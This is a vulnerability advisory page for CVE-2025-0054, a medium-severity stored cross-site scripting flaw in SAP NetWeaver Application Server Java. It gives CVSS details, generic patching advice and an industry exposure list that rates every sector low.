Description Preview
SAP NetWeaver Application Server Java does not sufficiently handle user input, resulting in a stored cross-site scripting vulnerability. This vulnerability allows attackers with basic user privileges to store a JavaScript payload on the server. The payload can later be executed in the victim's web browser, potentially enabling the attacker to read or modify information associated with the vulnerable web page. The vulnerability has a CVSS base score of 5.4, indicating a medium severity level, with low impacts on confidentiality and integrity, and requires user interaction for exploitation.
Overview
- CVE ID: CVE-2025-0054
- Vendor: SAP
- Affected Product: SAP NetWeaver Application Server Java
- Affected Versions: EP-BASIS 7.50, FRAMEWORK-EXT 7.50
- Vulnerability Type: Stored Cross-Site Scripting (XSS)
- CVSS Score: 5.4 (Medium)
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: Required
- Scope: Changed
Remediation
To mitigate the risk associated with CVE-2025-0054, it is recommended that users of SAP NetWeaver Application Server Java upgrade to the latest version that addresses this vulnerability. Regularly applying security patches and updates provided by SAP is crucial. For specific guidance on remediation, refer to the SAP Security Patch Day notes and the relevant SAP support documentation.
References
Industry ExposureMost to leastThis section illustrates the prevalence of a specific Common Vulnerabilities and Exposures (CVE) across various industries based on customer reports. The ranking displays industries from the most to least affected by this particular vulnerability, offering valuable insight into where this CVE has been most frequently observed. This information can help organizations within these sectors prioritize their security efforts, understand their relative risk exposure compared to their peers, and focus remediation strategies where they are most needed. By understanding the industry-specific impact, organizations can make more informed decisions regarding patching, resource allocation, and overall risk management related to this CVE.
This section illustrates the prevalence of a specific Common Vulnerabilities and Exposures (CVE) across various industries based on customer reports. The ranking displays industries from the most to least affected by this particular vulnerability, offering valuable insight into where this CVE has been most frequently observed. This information can help organizations within these sectors prioritize their security efforts, understand their relative risk exposure compared to their peers, and focus remediation strategies where they are most needed. By understanding the industry-specific impact, organizations can make more informed decisions regarding patching, resource allocation, and overall risk management related to this CVE.
- ManufacturingManufacturing: Low
- Accommodation & Food ServicesAccommodation & Food Services: Low
- Administrative, Support, Waste Management & Remediation ServicesAdministrative, Support, Waste Management & Remediation Services: Low
- Agriculture, Forestry Fishing & HuntingAgriculture, Forestry Fishing & Hunting: Low
- Arts, Entertainment & RecreationArts, Entertainment & Recreation: Low
- ConstructionConstruction: Low
- Educational ServicesEducational Services: Low
- Finance and InsuranceFinance and Insurance: Low
- Health Care & Social AssistanceHealth Care & Social Assistance: Low
- InformationInformation: Low
- Management of Companies & EnterprisesManagement of Companies & Enterprises: Low
- MiningMining: Low
- Other Services (except Public Administration)Other Services (except Public Administration): Low
- Professional, Scientific, & Technical ServicesProfessional, Scientific, & Technical Services: Low
- Public AdministrationPublic Administration: Low
- Real Estate Rental & LeasingReal Estate Rental & Leasing: Low
- Retail TradeRetail Trade: Low
- Transportation & WarehousingTransportation & Warehousing: Low
- UtilitiesUtilities: Low
- Wholesale TradeWholesale Trade: Low
